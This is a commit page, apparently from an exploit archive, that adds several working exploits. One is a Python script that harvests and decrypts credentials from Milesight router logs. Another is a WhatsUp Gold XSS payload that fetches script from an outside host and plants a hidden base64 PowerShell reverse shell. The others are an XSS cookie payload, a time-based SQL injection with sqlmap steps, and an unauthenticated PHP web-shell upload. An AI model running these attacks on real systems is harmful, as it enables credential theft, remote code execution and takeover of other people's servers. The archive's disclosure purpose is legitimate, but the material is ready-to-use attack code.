Merge remote-tracking branch 'upstream/main'

CERTCC · Feb 6, 2024 · 117fb7d · 117fb7d
2 parents 20e4c93 + 0c65b88
commit 117fb7d
Show file tree

Hide file tree

Showing 10 changed files with 473 additions and 3 deletions.
diff --git a/exploits/hardware/remote/51784.py b/exploits/hardware/remote/51784.py
@@ -0,0 +1,81 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+"""
+Title: Credential Leakage Through Unprotected System Logs and Weak Password Encryption
+CVE: CVE-2023-43261
+Script Author: Bipin Jitiya (@win3zz)
+Vendor: Milesight IoT - https://www.milesight-iot.com/ (Formerly Xiamen Ursalink Technology Co., Ltd.)
+Software/Hardware: UR5X, UR32L, UR32, UR35, UR41 and there might be other Industrial Cellular Router could also be vulnerable.
+Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10
+Writeup: https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf
+"""
+
+import sys
+import requests
+import re
+import warnings
+from Crypto.Cipher import AES # pip install pycryptodome
+from Crypto.Util.Padding import unpad
+import base64
+import time
+
+warnings.filterwarnings("ignore")
+
+KEY = b'1111111111111111'
+IV = b'2222222222222222'
+
+def decrypt_password(password):
+    try:
+        return unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(password)), AES.block_size).decode('utf-8')
+    except ValueError as e:
+        display_output('      [-] Error occurred during password decryption: ' + str(e), 'red')
+
+def display_output(message, color):
+    colors = {'red': '\033[91m', 'green': '\033[92m', 'blue': '\033[94m', 'yellow': '\033[93m', 'cyan': '\033[96m', 'end': '\033[0m'}
+    print(f"{colors[color]}{message}{colors['end']}")
+    time.sleep(0.5)
+
+urls = []
+
+if len(sys.argv) == 2:
+    urls.append(sys.argv[1])
+
+if len(sys.argv) == 3 and sys.argv[1] == '-f':
+    with open(sys.argv[2], 'r') as file:
+        urls.extend(file.read().splitlines())
+
+if len(urls) == 0:
+    display_output('Please provide a URL or a file with a list of URLs.', 'red')
+    display_output('Example: python3 ' + sys.argv[0] + ' https://example.com', 'blue')
+    display_output('Example: python3 ' + sys.argv[0] + ' -f urls.txt', 'blue')
+    sys.exit()
+
+use_proxy = False
+proxies = {'http': 'http://127.0.0.1:8080/'} if use_proxy else None
+
+for url in urls:
+    display_output('[*] Initiating data retrieval for: ' + url + '/lang/log/httpd.log', 'blue')
+    response = requests.get(url + '/lang/log/httpd.log', proxies=proxies, verify=False)
+
+    if response.status_code == 200:
+        display_output('[+] Data retrieval successful for: ' + url + '/lang/log/httpd.log', 'green')
+        data = response.text
+        credentials = set(re.findall(r'"username":"(.*?)","password":"(.*?)"', data))
+
+        num_credentials = len(credentials)
+        display_output(f'[+] Found {num_credentials} unique credentials for: ' + url, 'green')
+
+        if num_credentials > 0:
+            display_output('[+] Login page: ' + url + '/login.html', 'green')
+            display_output('[*] Extracting and decrypting credentials for: ' + url, 'blue')
+            display_output('[+] Unique Credentials:', 'yellow')
+            for i, (username, password) in enumerate(credentials, start=1):
+                display_output(f'    Credential {i}:', 'cyan')
+                decrypted_password = decrypt_password(password.encode('utf-8'))
+                display_output(f'      - Username: {username}', 'green')
+                display_output(f'      - Password: {decrypted_password}', 'green')
+        else:
+            display_output('[-] No credentials found in the retrieved data for: ' + url, 'red')
+    else:
+        display_output('[-] Data retrieval failed. Please check the URL: ' + url, 'red')
diff --git a/exploits/multiple/webapps/51781.txt b/exploits/multiple/webapps/51781.txt
@@ -0,0 +1,139 @@
+# Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS)
+# Date: April 18, 2023
+# Exploit Author: Andreas Finstad (4ndr34z)
+# Vendor Homepage: https://www.whatsupgold.com
+# Version: v.22.1.0 Build 39
+# Tested on: Windows 2022 Server
+# CVE : CVE-2023-35759
+# Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759
+
+
+
+WhatsUp Gold 2022 (22.1.0 Build 39)
+
+Stored XSS in sysName SNMP parameter.
+
+
+Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39)
+Product Name: WhatsUp Gold 2022
+Version: 22.1.0 Build 39
+Vulnerability Type: Stored Cross-Site Scripting (XSS)
+
+Description:
+WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP.
+
+An attacker can exploit this vulnerability by crafting a specially crafted SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions.
+
+As there is no CSRF tokens or CDP, it is trivial to create a javascript payload that adds an scheduled action on the server, that executes code as "NT System". In my POC code, I add a Powershell revshell that connects out to the attacker every 5 minutes. (screenshot3)
+
+The XSS trigger when clicking the "All names and addresses"
+
+Stage:
+
+Base64 encoded id property:
+var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a);
+
+Staged payload placed in the SNMP sysName Field on a device:
+<img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))>
+
+payload:
+
+var vhost = window.location.protocol+'\/\/'+window.location.host
+
+addaction();
+async function addaction() {
+var arguments = ''
+let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{
+    method: 'POST',
+    headers: {
+        'Connection': 'close',
+        'Content-Length': '1902',
+        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',
+        'Accept': 'application/json',
+        'Content-Type': 'application/json',
+        'X-Requested-With': 'XMLHttpRequest',
+        'sec-ch-ua-mobile': '?0',
+        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',
+        'sec-ch-ua-platform': '"macOS"',
+        'Sec-Fetch-Mode': 'cors',
+        'Sec-Fetch-Dest': 'empty',
+        'Accept-Encoding': 'gzip, deflate',
+        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'
+    },
+    credentials: 'include',
+    body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}'
+});
+
+
+setTimeout(() => { getactions(); }, 1000);
+
+};
+
+
+
+async function getactions() {
+
+const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{
+    method: 'GET',
+    headers: {
+        'Connection': 'close',
+        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',
+        'Accept': 'application/json',
+        'Content-Type': 'application/json',
+        'X-Requested-With': 'XMLHttpRequest',
+        'sec-ch-ua-mobile': '?0',
+        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',
+        'sec-ch-ua-platform': '"macOS"',
+        'Sec-Fetch-Site': 'same-origin',
+        'Sec-Fetch-Mode': 'cors',
+        'Sec-Fetch-Dest': 'empty',
+        'Accept-Encoding': 'gzip, deflate',
+        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'
+    },
+    credentials: 'include'
+
+});
+const actions = await response.json();
+var results = [];
+var searchField = "Name";
+var searchVal = "Systemtask";
+for (var i=0 ; i < actions.length ; i++)
+{
+    if (actions[i][searchField] == searchVal) {
+        results.push(actions[i].Id);
+        revshell(results[0])
+
+    }
+}
+//console.log(actions);
+
+};
+
+
+async function revshell(ID) {
+fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{
+    method: 'POST',
+    headers: {
+        'Connection': 'close',
+        'Content-Length': '2442',
+        'Cache-Control': 'max-age=0',
+        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',
+        'sec-ch-ua-mobile': '?0',
+        'sec-ch-ua-platform': '"macOS"',
+        'Upgrade-Insecure-Requests': '1',
+        'Origin': 'https://192.168.16.100',
+        'Content-Type': 'application/x-www-form-urlencoded',
+        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',
+        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
+        'Sec-Fetch-Site': 'same-origin',
+        'Sec-Fetch-Mode': 'navigate',
+        'Sec-Fetch-User': '?1',
+        'Sec-Fetch-Dest': 'iframe',
+        'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',
+        'Accept-Encoding': 'gzip, deflate',
+        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'
+    },
+    credentials: 'include',
+    body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0'
+});
+};
diff --git a/exploits/php/webapps/51777.txt b/exploits/php/webapps/51777.txt
@@ -0,0 +1,36 @@
+# Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored)
+# Date: 29/09/2023
+# Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip
+# Version: 1.0
+# Last Update: 31 August 2022
+# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30
+
+# 1: Create user, login and go to profile.php
+
+# 2: Use payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 in lname field.
+
+# 3: When entering the profile.php page, document.cookie will be reflected every time.
+
+# Author
+This vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner.
+
+# About Rapplex
+Rapplex is a web applicaton security scanner that scans and reports vulnerabilities in websites.
+Pentesters can use it as an automation tool for daily tasks but "Pentester Studio" will provide such a great addition as well in their manual assessments.
+So, the software does not need separate development tools to discover different types of vulnerabilities or to develop existing engines.
+"Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection, Fle Incluson.
+
+
+# HTTP Request
+
+POST /gym/profile.php HTTP/1.1
+Host: localhost
+Content-Length: 129
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGE
+Connection: close
+
+fname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update
diff --git a/exploits/php/webapps/51778.txt b/exploits/php/webapps/51778.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL
+Injection
+# Date: 28/9/2023
+# Exploit Author: Puja Dey
+# Vendor Homepage: https://phpgurukul.com
+# Software Link:
+https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10/Wamp
+
+1) login into the application
+2) click on report on pass and capture the request in burpsuite
+3) Parameter "FromDate" is vulnerable to SQL Injection
+Parameter: #1* ((custom) POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND
+'SOzQ'='SOzQ&todate=&submit=
+4) Put '*' in the value for the parameter and save the item as cpme
+5) Run sqlmap -r cpme --batch --dbs --random-agent
diff --git a/exploits/php/webapps/51779.txt b/exploits/php/webapps/51779.txt
@@ -0,0 +1,101 @@
+# Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE
+# Date: 07.10.2023
+# Exploit Author: Oğulcan Hami Gül
+# Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code
+# Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code
+# Version: 1.0
+# Tested on: Windows 10
+
+## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication.
+
+POST /pms/users.php HTTP/1.1
+
+Host: 192.168.1.36
+
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate, br
+
+Content-Type: multipart/form-data; boundary=---------------------------421755697017784551042596452367
+
+Content-Length: 1054
+
+Origin: http://192.168.1.36
+
+Connection: close
+
+Referer: http://192.168.1.36/pms/users.php
+
+Upgrade-Insecure-Requests: 1
+
+
+
+-----------------------------421755697017784551042596452367
+
+Content-Disposition: form-data; name="display_name"
+
+
+
+sefa7
+
+-----------------------------421755697017784551042596452367
+
+Content-Disposition: form-data; name="user_name"
+
+
+
+sefa7
+
+-----------------------------421755697017784551042596452367
+
+Content-Disposition: form-data; name="password"
+
+
+
+sefa7
+
+-----------------------------421755697017784551042596452367
+
+Content-Disposition: form-data; name="profile_picture"; filename="simple-backdoor.php"
+
+Content-Type: application/x-php
+
+
+
+<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
+
+<?php
+
+if(isset($_REQUEST['cmd'])){
+        echo "<pre>";
+        $cmd = ($_REQUEST['cmd']);
+        system($cmd);
+        echo "</pre>";
+        die;
+}
+
+?>
+
+Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
+
+<!--    http://michaeldaw.org   2006    -->
+
+
+-----------------------------421755697017784551042596452367
+
+Content-Disposition: form-data; name="save_user"
+
+
+
+
+
+-----------------------------421755697017784551042596452367--
+
+
+## After the file upload request sent by attacker, Application adds a random number to the beginning of the file to be uploaded. Malicious file can be seen under the path /pms/users.php without any authentication.
+
+## With the request http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami the attacker can execute arbitrary command on the application server.